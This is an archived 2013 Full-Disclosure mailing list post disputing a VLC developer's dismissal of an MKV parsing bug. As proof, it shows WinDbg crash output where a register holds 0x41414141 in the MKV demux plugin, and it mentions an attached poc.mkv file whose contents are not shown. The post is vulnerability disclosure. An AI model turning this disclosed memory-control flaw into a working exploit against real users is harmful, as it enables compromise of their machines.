lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CADe7mMfrCftjJHX7k9O9QdZfR5J=UfmaRsiu6BJJ3QLvATxt3g@mail.gmail.com>
Date: Wed, 10 Jul 2013 03:03:25 +0430
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: VLC media player MKV Parsing POC

Hello list,
regarding to nonsense VLC post

http://www.jbkempf.com/blog/post/2013/More-lies-from-Secunia?pub=0#pr

1.we said that this was a crash, not an exploitable security issue

and funny publication Comment

You forget to mention most important thing: If Secunia Research is
professional, why don't they provide you with working exploit? (in example
EIP = 0x41414141) I'm sure company like VUPEN would do just that to prove
they point. Isn't worth to point out on other sites? (e.g. netsec)
I really like this
https://twitter.com/Secunia/status/...<https://twitter.com/Secunia/status/337140449712156672>
 you can spot _two_ lies - first they don't find ANY vuln, second their
lying about timeframe.


Here is your VUPEN  0x41414141


ModLoad: 64fb0000 650d8000   C:\Program Files
(x86)\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll

(be8.f0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02b92a18 ebx=00890000 ecx=41414141 edx=00100000 esi=02bccbd8
edi=00890178
eip=77163fbb esp=04d1f324 ebp=04d1f348 iopl=0         nv up ei ng nz na po
cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010283
ntdll!RtlImageNtHeader+0xe37:
77163fbb 8b11            mov     edx,dword ptr [ecx]
 ds:002b:41414141=????????

0:010> g

(be8.f0c): Access violation - code c0000005 (!!! second chance !!!)
eax=02b92a18 ebx=00890000 ecx=41414141 edx=00100000 esi=02bccbd8
edi=00890178
eip=77163fbb esp=04d1f324 ebp=04d1f348 iopl=0         nv up ei ng nz na po
cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010283
ntdll!RtlImageNtHeader+0xe37:
77163fbb 8b11            mov     edx,dword ptr [ecx]
 ds:002b:41414141=????????

0:010> r ecx

ecx=41414141

0:010> d ecx
41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

POC included

Stay Secure

Regards
Kaveh

Content of type "text/html" skipped

Download attachment "poc.mkv" of type "application/octet-stream" (16360 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ